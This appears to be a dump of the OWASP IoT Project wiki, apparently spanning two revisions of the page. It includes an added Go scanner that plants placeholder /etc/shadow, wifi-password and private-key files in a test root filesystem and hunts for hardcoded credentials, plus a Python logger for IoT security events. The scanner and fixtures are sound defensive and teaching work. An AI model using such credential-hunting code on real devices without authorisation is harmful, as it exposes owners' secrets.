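		"etc/shadow":      "root:$6$c0nstr$uctedHashValue:18000:0:99999:7:::\nbackup::18000:0:99999:7:::\n",
		"etc/wifi.conf":   "ssid=lab-ap\nwifi_password=hunter2\n",
		"etc/ssl/dev.key": "-----BEGIN RSA PRIVATE KEY-----\nQ09OU1RSVUNURUQ=\n-----END RSA PRIVATE KEY-----\n",
		"etc/motd":        "Welcome to the device\n",
	}
	for rel, body := range files {
		p := filepath.Join(dir, filepath.FromSlash(rel))
		if err := os.MkdirAll(filepath.Dir(p), 0o755); err != nil {
			return err
		}
		if err := os.WriteFile(p, []byte(body), 0o644); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	dir := filepath.Join(os.TempDir(), "constructed-rootfs")
	defer os.RemoveAll(dir)
	if err := BuildSampleRootFS(dir); err != nil {
		panic(err)
	}
	findings, err := ScanRootFS(dir)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%-21s %-16s %s\n", f.Rule, f.Path, f.Detail)
	}
}
```
<br />
Running it against a real extraction (for example the squashfs root that binwalk pulls out of an image) only needs the path passed to ScanRootFS; the account-file check is the one that most often finds the "backdoor accounts" and "hardcoded credentials" items from the Device Firmware row, since an embedded /etc/passwd frequently still carries the hash in field 2 rather than shadowing it.<br />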
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
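The table above names the events a device should log but not what a device-side implementation looks like. The following is an added example, not code from the OWASP project: a small logger that watches a stream of requests to a device's HTTP front end and emits JSON-style records in the table's categories (unsupported HTTP method, multiple failed passwords, high login rate, use of default administrative credentials, and a session whose source address changes). The request shape, the thresholds, the window length, the placeholder default credentials and the sample traffic are all constructed for this example and are assumptions, not part of the OWASP list.<br />

```python
"""Device-side logger that emits a subset of the recommended IoT logging events
(request, authentication, session and administrative-mode categories).
Thresholds, field names and the sample traffic are constructed for this example."""
import json
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Optional

# Assumed detection thresholds (not part of the OWASP event list)
WINDOW_SECONDS = 60            # sliding window for rate and failure counting
FAILED_PASSWORD_THRESHOLD = 3  # failures for one account inside the window
LOGIN_RATE_THRESHOLD = 3       # login attempts per source above which the rate is "high"
SUPPORTED_METHODS = {"GET", "POST"}
# Placeholder factory credentials that should have been changed before deployment
DEFAULT_ADMIN_CREDENTIALS = {("admin", "admin")}


@dataclass
class Request:
    """One request as seen by the device's HTTP front end (constructed shape)."""
    ts: float
    src_ip: str
    method: str
    path: str
    user: Optional[str] = None
    password: Optional[str] = None
    auth_ok: bool = False
    session_id: Optional[str] = None


class IoTEventLogger:
    def __init__(self) -> None:
        self.events: List[dict] = []
        self._failures: Dict[str, Deque[float]] = defaultdict(deque)  # per account
        self._attempts: Dict[str, Deque[float]] = defaultdict(deque)  # per source IP
        self._session_origin: Dict[str, str] = {}                     # session -> first src_ip

    def _emit(self, category: str, event: str, req: Request, **extra) -> None:
        # Passwords are deliberately never copied into the record.
        self.events.append({"ts": req.ts, "category": category, "event": event,
                            "src_ip": req.src_ip, "path": req.path, **extra})

    @staticmethod
    def _count_in_window(bucket: Deque[float], now: float) -> int:
        """Record one occurrence and return how many fall inside the window."""
        bucket.append(now)
        while bucket and now - bucket[0] > WINDOW_SECONDS:
            bucket.popleft()
        return len(bucket)

    def handle(self, req: Request) -> None:
        if req.method not in SUPPORTED_METHODS:
            self._emit("Request Exceptions", "Attempt to Invoke Unsupported HTTP Method",
                       req, method=req.method)
        if req.path == "/login":
            if self._count_in_window(self._attempts[req.src_ip], req.ts) > LOGIN_RATE_THRESHOLD:
                self._emit("Authentication Exceptions", "High Rate of Login Attempts", req)
            if not req.auth_ok:
                if self._count_in_window(self._failures[req.user or ""], req.ts) >= FAILED_PASSWORD_THRESHOLD:
                    self._emit("Authentication Exceptions", "Multiple Failed Passwords", req, user=req.user)
            elif (req.user, req.password) in DEFAULT_ADMIN_CREDENTIALS:
                self._emit("Administrative Mode Events",
                           "Device Accessed Using Default Administrative Credentials", req, user=req.user)
        if req.session_id:
            origin = self._session_origin.setdefault(req.session_id, req.src_ip)
            if origin != req.src_ip:
                self._emit("Session Exceptions", "Source Location Changes During Session", req,
                           session_id=req.session_id, original_src_ip=origin)


# Constructed sample traffic: one normal request, one odd method, a burst of
# failed logins, a login with factory credentials, and a hijacked session.
SAMPLE_REQUESTS = [
    Request(ts=0.0, src_ip="10.0.0.5", method="GET", path="/status", session_id="s1"),
    Request(ts=1.0, src_ip="10.0.0.9", method="TRACE", path="/status"),
    Request(ts=2.0, src_ip="10.0.0.9", method="POST", path="/login", user="root", password="x"),
    Request(ts=3.0, src_ip="10.0.0.9", method="POST", path="/login", user="root", password="y"),
    Request(ts=4.0, src_ip="10.0.0.9", method="POST", path="/login", user="root", password="z"),
    Request(ts=5.0, src_ip="10.0.0.9", method="POST", path="/login", user="admin", password="admin", auth_ok=True),
    Request(ts=6.0, src_ip="10.0.0.77", method="GET", path="/config", session_id="s1"),
]


def run_sample() -> List[dict]:
    """Feed the constructed traffic through the logger and return the emitted events."""
    logger = IoTEventLogger()
    for req in SAMPLE_REQUESTS:
        logger.handle(req)
    return logger.events


if __name__ == "__main__":
    for record in run_sample():
        print(json.dumps(record))
```

Each record carries the category and event name verbatim from the table so a downstream SIEM rule can key on them; the sliding window means an account that fails twice and then stays quiet for longer than the window does not trip the failed-password event.<br />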
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general log far too few events to feed a solid detection and response program around IoT devices, and companies that want to do better have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246188OWASP Internet of Things Project2018-12-19T23:56:13Z<p>Aaron.guzman: /* Contributors */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security], and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vishruta Rudresh<br />
* Vijayamurugan Pushpanathan <br />
* Aaron Guzman <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
